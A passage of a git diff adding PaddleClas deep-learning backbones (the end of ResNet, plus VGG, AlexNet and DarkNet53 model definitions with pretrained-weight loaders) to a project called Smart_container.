"BottleneckBlock", + "block_depth": [3, 12, 48, 3], + "num_channels": [64, 256, 512, 1024] + }, +} + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + is_vd_mode=False, + act=None, + lr_mult=1.0, + data_format="NCHW"): + super().__init__() + self.is_vd_mode = is_vd_mode + self.act = act + self.avg_pool = AvgPool2D( + kernel_size=2, stride=2, padding=0, ceil_mode=True) + self.conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(learning_rate=lr_mult), + bias_attr=False, + data_format=data_format) + self.bn = BatchNorm( + num_filters, + param_attr=ParamAttr(learning_rate=lr_mult), + bias_attr=ParamAttr(learning_rate=lr_mult), + data_layout=data_format) + self.relu = nn.ReLU() + + def forward(self, x): + if self.is_vd_mode: + x = self.avg_pool(x) + x = self.conv(x) + x = self.bn(x) + if self.act: + x = self.relu(x) + return x + + +class BottleneckBlock(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + if_first=False, + lr_mult=1.0, + data_format="NCHW"): + super().__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act="relu", + lr_mult=lr_mult, + data_format=data_format) + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + stride=stride, + act="relu", + lr_mult=lr_mult, + data_format=data_format) + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 4, + filter_size=1, + act=None, + lr_mult=lr_mult, + data_format=data_format) + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 4, + filter_size=1, + stride=stride if if_first else 1, + is_vd_mode=False if if_first else True, + lr_mult=lr_mult, + data_format=data_format) + self.relu = nn.ReLU() + self.shortcut = shortcut + + def forward(self, x): + identity = x + x = self.conv0(x) + x = self.conv1(x) + x = self.conv2(x) + + if self.shortcut: + short = identity + else: + short = self.short(identity) + x = paddle.add(x=x, y=short) + x = self.relu(x) + return x + + +class BasicBlock(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + if_first=False, + lr_mult=1.0, + data_format="NCHW"): + super().__init__() + + self.stride = stride + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=3, + stride=stride, + act="relu", + lr_mult=lr_mult, + data_format=data_format) + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + act=None, + lr_mult=lr_mult, + data_format=data_format) + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + stride=stride if if_first else 1, + is_vd_mode=False if if_first else True, + lr_mult=lr_mult, + data_format=data_format) + self.shortcut = shortcut + self.relu = nn.ReLU() + + def forward(self, x): + identity = x + x = self.conv0(x) + x = self.conv1(x) + if self.shortcut: + short = identity + else: + short = self.short(identity) + x = paddle.add(x=x, y=short) + x = self.relu(x) + return x + + +class ResNet(TheseusLayer): + """ + ResNet + Args: + config: dict. config of ResNet. + version: str="vb". Different version of ResNet, version vd can perform better. + class_num: int=1000. The number of classes. + lr_mult_list: list. Control the learning rate of different stages. + Returns: + model: nn.Layer. Specific ResNet model depends on args. + """ + + def __init__(self, + config, + version="vb", + class_num=1000, + lr_mult_list=[1.0, 1.0, 1.0, 1.0, 1.0], + data_format="NCHW", + input_image_channel=3, + return_patterns=None): + super().__init__() + + self.cfg = config + self.lr_mult_list = lr_mult_list + self.is_vd_mode = version == "vd" + self.class_num = class_num + self.num_filters = [64, 128, 256, 512] + self.block_depth = self.cfg["block_depth"] + self.block_type = self.cfg["block_type"] + self.num_channels = self.cfg["num_channels"] + self.channels_mult = 1 if self.num_channels[-1] == 256 else 4 + + assert isinstance(self.lr_mult_list, ( + list, tuple + )), "lr_mult_list should be in (list, tuple) but got {}".format( + type(self.lr_mult_list)) + assert len(self.lr_mult_list + ) == 5, "lr_mult_list length should be 5 but got {}".format( + len(self.lr_mult_list)) + + self.stem_cfg = { + #num_channels, num_filters, filter_size, stride + "vb": [[input_image_channel, 64, 7, 2]], + "vd": + [[input_image_channel, 32, 3, 2], [32, 32, 3, 1], [32, 64, 3, 1]] + } + + self.stem = nn.Sequential(* [ + ConvBNLayer( + num_channels=in_c, + num_filters=out_c, + filter_size=k, + stride=s, + act="relu", + lr_mult=self.lr_mult_list[0], + data_format=data_format) + for in_c, out_c, k, s in self.stem_cfg[version] + ]) + + self.max_pool = MaxPool2D( + kernel_size=3, stride=2, padding=1, data_format=data_format) + block_list = [] + for block_idx in range(len(self.block_depth)): + shortcut = False + for i in range(self.block_depth[block_idx]): + block_list.append(globals()[self.block_type]( + num_channels=self.num_channels[block_idx] if i == 0 else + self.num_filters[block_idx] * self.channels_mult, + num_filters=self.num_filters[block_idx], + stride=2 if i == 0 and block_idx != 0 else 1, + shortcut=shortcut, + if_first=block_idx == i == 0 if version == "vd" else True, + lr_mult=self.lr_mult_list[block_idx + 1], + data_format=data_format)) + shortcut = True + self.blocks = nn.Sequential(*block_list) + + self.avg_pool = AdaptiveAvgPool2D(1, data_format=data_format) + self.flatten = nn.Flatten() + self.avg_pool_channels = self.num_channels[-1] * 2 + stdv = 1.0 / math.sqrt(self.avg_pool_channels * 1.0) + self.fc = Linear( + self.avg_pool_channels, + self.class_num, + weight_attr=ParamAttr(initializer=Uniform(-stdv, stdv))) + + self.data_format = data_format + if return_patterns is not None: + self.update_res(return_patterns) + self.register_forward_post_hook(self._return_dict_hook) + + def forward(self, x): + with paddle.static.amp.fp16_guard(): + if self.data_format == "NHWC": + x = paddle.transpose(x, [0, 2, 3, 1]) + x.stop_gradient = True + x = self.stem(x) + x = self.max_pool(x) + x = self.blocks(x) + x = self.avg_pool(x) + x = self.flatten(x) + x = self.fc(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ResNet18(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet18 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet18` model depends on args. + """ + model = ResNet(config=NET_CONFIG["18"], version="vb", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet18"], use_ssld) + return model + + +def ResNet18_vd(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet18_vd + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet18_vd` model depends on args. + """ + model = ResNet(config=NET_CONFIG["18"], version="vd", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet18_vd"], use_ssld) + return model + + +def ResNet34(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet34 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet34` model depends on args. + """ + model = ResNet(config=NET_CONFIG["34"], version="vb", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet34"], use_ssld) + return model + + +def ResNet34_vd(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet34_vd + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet34_vd` model depends on args. + """ + model = ResNet(config=NET_CONFIG["34"], version="vd", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet34_vd"], use_ssld) + return model + + +def ResNet50(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet50 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet50` model depends on args. + """ + model = ResNet(config=NET_CONFIG["50"], version="vb", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet50"], use_ssld) + return model + + +def ResNet50_vd(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet50_vd + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet50_vd` model depends on args. + """ + model = ResNet(config=NET_CONFIG["50"], version="vd", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet50_vd"], use_ssld) + return model + + +def ResNet101(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet101 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet101` model depends on args. + """ + model = ResNet(config=NET_CONFIG["101"], version="vb", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet101"], use_ssld) + return model + + +def ResNet101_vd(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet101_vd + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet101_vd` model depends on args. + """ + model = ResNet(config=NET_CONFIG["101"], version="vd", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet101_vd"], use_ssld) + return model + + +def ResNet152(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet152 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet152` model depends on args. + """ + model = ResNet(config=NET_CONFIG["152"], version="vb", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet152"], use_ssld) + return model + + +def ResNet152_vd(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet152_vd + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet152_vd` model depends on args. + """ + model = ResNet(config=NET_CONFIG["152"], version="vd", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet152_vd"], use_ssld) + return model + + +def ResNet200_vd(pretrained=False, use_ssld=False, **kwargs): + """ + ResNet200_vd + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `ResNet200_vd` model depends on args. + """ + model = ResNet(config=NET_CONFIG["200"], version="vd", **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["ResNet200_vd"], use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/vgg.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/vgg.py new file mode 100644 index 0000000..9b1750d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/vgg.py @@ -0,0 +1,231 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function + +import paddle.nn as nn +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import MaxPool2D + +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "VGG11": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/VGG11_pretrained.pdparams", + "VGG13": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/VGG13_pretrained.pdparams", + "VGG16": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/VGG16_pretrained.pdparams", + "VGG19": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/VGG19_pretrained.pdparams", +} +__all__ = MODEL_URLS.keys() + +# VGG config +# key: VGG network depth +# value: conv num in different blocks +NET_CONFIG = { + 11: [1, 1, 2, 2, 2], + 13: [2, 2, 2, 2, 2], + 16: [2, 2, 3, 3, 3], + 19: [2, 2, 4, 4, 4] +} + + +class ConvBlock(TheseusLayer): + def __init__(self, input_channels, output_channels, groups): + super().__init__() + + self.groups = groups + self.conv1 = Conv2D( + in_channels=input_channels, + out_channels=output_channels, + kernel_size=3, + stride=1, + padding=1, + bias_attr=False) + if groups == 2 or groups == 3 or groups == 4: + self.conv2 = Conv2D( + in_channels=output_channels, + out_channels=output_channels, + kernel_size=3, + stride=1, + padding=1, + bias_attr=False) + if groups == 3 or groups == 4: + self.conv3 = Conv2D( + in_channels=output_channels, + out_channels=output_channels, + kernel_size=3, + stride=1, + padding=1, + bias_attr=False) + if groups == 4: + self.conv4 = Conv2D( + in_channels=output_channels, + out_channels=output_channels, + kernel_size=3, + stride=1, + padding=1, + bias_attr=False) + + self.max_pool = MaxPool2D(kernel_size=2, stride=2, padding=0) + self.relu = nn.ReLU() + + def forward(self, inputs): + x = self.conv1(inputs) + x = self.relu(x) + if self.groups == 2 or self.groups == 3 or self.groups == 4: + x = self.conv2(x) + x = self.relu(x) + if self.groups == 3 or self.groups == 4: + x = self.conv3(x) + x = self.relu(x) + if self.groups == 4: + x = self.conv4(x) + x = self.relu(x) + x = self.max_pool(x) + return x + + +class VGGNet(TheseusLayer): + """ + VGGNet + Args: + config: list. VGGNet config. + stop_grad_layers: int=0. The parameters in blocks which index larger than `stop_grad_layers`, will be set `param.trainable=False` + class_num: int=1000. The number of classes. + Returns: + model: nn.Layer. Specific VGG model depends on args. + """ + + def __init__(self, config, stop_grad_layers=0, class_num=1000, return_patterns=None): + super().__init__() + + self.stop_grad_layers = stop_grad_layers + + self.conv_block_1 = ConvBlock(3, 64, config[0]) + self.conv_block_2 = ConvBlock(64, 128, config[1]) + self.conv_block_3 = ConvBlock(128, 256, config[2]) + self.conv_block_4 = ConvBlock(256, 512, config[3]) + self.conv_block_5 = ConvBlock(512, 512, config[4]) + + self.relu = nn.ReLU() + self.flatten = nn.Flatten(start_axis=1, stop_axis=-1) + + for idx, block in enumerate([ + self.conv_block_1, self.conv_block_2, self.conv_block_3, + self.conv_block_4, self.conv_block_5 + ]): + if self.stop_grad_layers >= idx + 1: + for param in block.parameters(): + param.trainable = False + + self.drop = Dropout(p=0.5, mode="downscale_in_infer") + self.fc1 = Linear(7 * 7 * 512, 4096) + self.fc2 = Linear(4096, 4096) + self.fc3 = Linear(4096, class_num) + if return_patterns is not None: + self.update_res(return_patterns) + self.register_forward_post_hook(self._return_dict_hook) + + def forward(self, inputs): + x = self.conv_block_1(inputs) + x = self.conv_block_2(x) + x = self.conv_block_3(x) + x = self.conv_block_4(x) + x = self.conv_block_5(x) + x = self.flatten(x) + x = self.fc1(x) + x = self.relu(x) + x = self.drop(x) + x = self.fc2(x) + x = self.relu(x) + x = self.drop(x) + x = self.fc3(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def VGG11(pretrained=False, use_ssld=False, **kwargs): + """ + VGG11 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `VGG11` model depends on args. + """ + model = VGGNet(config=NET_CONFIG[11], **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["VGG11"], use_ssld) + return model + + +def VGG13(pretrained=False, use_ssld=False, **kwargs): + """ + VGG13 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `VGG13` model depends on args. + """ + model = VGGNet(config=NET_CONFIG[13], **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["VGG13"], use_ssld) + return model + + +def VGG16(pretrained=False, use_ssld=False, **kwargs): + """ + VGG16 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `VGG16` model depends on args. + """ + model = VGGNet(config=NET_CONFIG[16], **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["VGG16"], use_ssld) + return model + + +def VGG19(pretrained=False, use_ssld=False, **kwargs): + """ + VGG19 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `VGG19` model depends on args. + """ + model = VGGNet(config=NET_CONFIG[19], **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["VGG19"], use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/__init__.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/alexnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/alexnet.py new file mode 100644 index 0000000..b44901a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/alexnet.py @@ -0,0 +1,168 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout, ReLU +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "AlexNet": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/AlexNet_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvPoolLayer(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter_size, + stride, + padding, + stdv, + groups=1, + act=None, + name=None): + super(ConvPoolLayer, self).__init__() + + self.relu = ReLU() if act == "relu" else None + + self._conv = Conv2D( + in_channels=input_channels, + out_channels=output_channels, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=groups, + weight_attr=ParamAttr( + name=name + "_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr( + name=name + "_offset", initializer=Uniform(-stdv, stdv))) + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + + def forward(self, inputs): + x = self._conv(inputs) + if self.relu is not None: + x = self.relu(x) + x = self._pool(x) + return x + + +class AlexNetDY(nn.Layer): + def __init__(self, class_num=1000): + super(AlexNetDY, self).__init__() + + stdv = 1.0 / math.sqrt(3 * 11 * 11) + self._conv1 = ConvPoolLayer( + 3, 64, 11, 4, 2, stdv, act="relu", name="conv1") + stdv = 1.0 / math.sqrt(64 * 5 * 5) + self._conv2 = ConvPoolLayer( + 64, 192, 5, 1, 2, stdv, act="relu", name="conv2") + stdv = 1.0 / math.sqrt(192 * 3 * 3) + self._conv3 = Conv2D( + 192, + 384, + 3, + stride=1, + padding=1, + weight_attr=ParamAttr( + name="conv3_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr( + name="conv3_offset", initializer=Uniform(-stdv, stdv))) + stdv = 1.0 / math.sqrt(384 * 3 * 3) + self._conv4 = Conv2D( + 384, + 256, + 3, + stride=1, + padding=1, + weight_attr=ParamAttr( + name="conv4_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr( + name="conv4_offset", initializer=Uniform(-stdv, stdv))) + stdv = 1.0 / math.sqrt(256 * 3 * 3) + self._conv5 = ConvPoolLayer( + 256, 256, 3, 1, 1, stdv, act="relu", name="conv5") + stdv = 1.0 / math.sqrt(256 * 6 * 6) + + self._drop1 = Dropout(p=0.5, mode="downscale_in_infer") + self._fc6 = Linear( + in_features=256 * 6 * 6, + out_features=4096, + weight_attr=ParamAttr( + name="fc6_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr( + name="fc6_offset", initializer=Uniform(-stdv, stdv))) + + self._drop2 = Dropout(p=0.5, mode="downscale_in_infer") + self._fc7 = Linear( + in_features=4096, + out_features=4096, + weight_attr=ParamAttr( + name="fc7_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr( + name="fc7_offset", initializer=Uniform(-stdv, stdv))) + self._fc8 = Linear( + in_features=4096, + out_features=class_num, + weight_attr=ParamAttr( + name="fc8_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr( + name="fc8_offset", initializer=Uniform(-stdv, stdv))) + + def forward(self, inputs): + x = self._conv1(inputs) + x = self._conv2(x) + x = self._conv3(x) + x = F.relu(x) + x = self._conv4(x) + x = F.relu(x) + x = self._conv5(x) + x = paddle.flatten(x, start_axis=1, stop_axis=-1) + x = self._drop1(x) + x = self._fc6(x) + x = F.relu(x) + x = self._drop2(x) + x = self._fc7(x) + x = F.relu(x) + x = self._fc8(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def AlexNet(pretrained=False, use_ssld=False, **kwargs): + model = AlexNetDY(**kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["AlexNet"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/darknet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/darknet.py new file mode 100644 index 0000000..75aafd8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/darknet.py @@ -0,0 +1,197 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "DarkNet53": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DarkNet53_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + input_channels, + output_channels, + filter_size, + stride, + padding, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=input_channels, + out_channels=output_channels, + kernel_size=filter_size, + stride=stride, + padding=padding, + weight_attr=ParamAttr(name=name + ".conv.weights"), + bias_attr=False) + + bn_name = name + ".bn" + self._bn = BatchNorm( + num_channels=output_channels, + act="relu", + param_attr=ParamAttr(name=bn_name + ".scale"), + bias_attr=ParamAttr(name=bn_name + ".offset"), + moving_mean_name=bn_name + ".mean", + moving_variance_name=bn_name + ".var") + + def forward(self, inputs): + x = self._conv(inputs) + x = self._bn(x) + return x + + +class BasicBlock(nn.Layer): + def __init__(self, input_channels, output_channels, name=None): + super(BasicBlock, self).__init__() + + self._conv1 = ConvBNLayer( + input_channels, output_channels, 1, 1, 0, name=name + ".0") + self._conv2 = ConvBNLayer( + output_channels, output_channels * 2, 3, 1, 1, name=name + ".1") + + def forward(self, inputs): + x = self._conv1(inputs) + x = self._conv2(x) + return paddle.add(x=inputs, y=x) + + +class DarkNet(nn.Layer): + def __init__(self, class_num=1000): + super(DarkNet, self).__init__() + + self.stages = [1, 2, 8, 8, 4] + self._conv1 = ConvBNLayer(3, 32, 3, 1, 1, name="yolo_input") + self._conv2 = ConvBNLayer( + 32, 64, 3, 2, 1, name="yolo_input.downsample") + + self._basic_block_01 = BasicBlock(64, 32, name="stage.0.0") + self._downsample_0 = ConvBNLayer( + 64, 128, 3, 2, 1, name="stage.0.downsample") + + self._basic_block_11 = BasicBlock(128, 64, name="stage.1.0") + self._basic_block_12 = BasicBlock(128, 64, name="stage.1.1") + self._downsample_1 = ConvBNLayer( + 128, 256, 3, 2, 1, name="stage.1.downsample") + + self._basic_block_21 = BasicBlock(256, 128, name="stage.2.0") + self._basic_block_22 = BasicBlock(256, 128, name="stage.2.1") + self._basic_block_23 = BasicBlock(256, 128, name="stage.2.2") + self._basic_block_24 = BasicBlock(256, 128, name="stage.2.3") + self._basic_block_25 = BasicBlock(256, 128, name="stage.2.4") + self._basic_block_26 = BasicBlock(256, 128, name="stage.2.5") + self._basic_block_27 = BasicBlock(256, 128, name="stage.2.6") + self._basic_block_28 = BasicBlock(256, 128, name="stage.2.7") + self._downsample_2 = ConvBNLayer( + 256, 512, 3, 2, 1, name="stage.2.downsample") + + self._basic_block_31 = BasicBlock(512, 256, name="stage.3.0") + self._basic_block_32 = BasicBlock(512, 256, name="stage.3.1") + self._basic_block_33 = BasicBlock(512, 256, name="stage.3.2") + self._basic_block_34 = BasicBlock(512, 256, name="stage.3.3") + self._basic_block_35 = BasicBlock(512, 256, name="stage.3.4") + self._basic_block_36 = BasicBlock(512, 256, name="stage.3.5") + self._basic_block_37 = BasicBlock(512, 256, name="stage.3.6") + self._basic_block_38 = BasicBlock(512, 256, name="stage.3.7") + self._downsample_3 = ConvBNLayer( + 512, 1024, 3, 2, 1, name="stage.3.downsample") + + self._basic_block_41 = BasicBlock(1024, 512, name="stage.4.0") + self._basic_block_42 = BasicBlock(1024, 512, name="stage.4.1") + self._basic_block_43 = BasicBlock(1024, 512, name="stage.4.2") + self._basic_block_44 = BasicBlock(1024, 512, name="stage.4.3") + + self._pool = AdaptiveAvgPool2D(1) + + stdv = 1.0 / math.sqrt(1024.0) + self._out = Linear( + 1024, + class_num, + weight_attr=ParamAttr( + name="fc_weights", initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, inputs): + x = self._conv1(inputs) + x = self._conv2(x) + + x = self._basic_block_01(x) + x = self._downsample_0(x) + + x = self._basic_block_11(x) + x = self._basic_block_12(x) + x = self._downsample_1(x) + + x = self._basic_block_21(x) + x = self._basic_block_22(x) + x = self._basic_block_23(x) + x = self._basic_block_24(x) + x = self._basic_block_25(x) + x = self._basic_block_26(x) + x = self._basic_block_27(x) + x = self._basic_block_28(x) + x = self._downsample_2(x) + + x = self._basic_block_31(x) + x = self._basic_block_32(x) + x = self._basic_block_33(x) + x = self._basic_block_34(x) + x = self._basic_block_35(x) + x = self._basic_block_36(x) + x = self._basic_block_37(x) + x = self._basic_block_38(x) + x = self._downsample_3(x) + + x = self._basic_block_41(x) + x = self._basic_block_42(x) + x = self._basic_block_43(x) + x = self._basic_block_44(x) + + x = self._pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self._out(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def DarkNet53(pretrained=False, use_ssld=False, **kwargs): + model = DarkNet(**kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DarkNet53"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/densenet.py 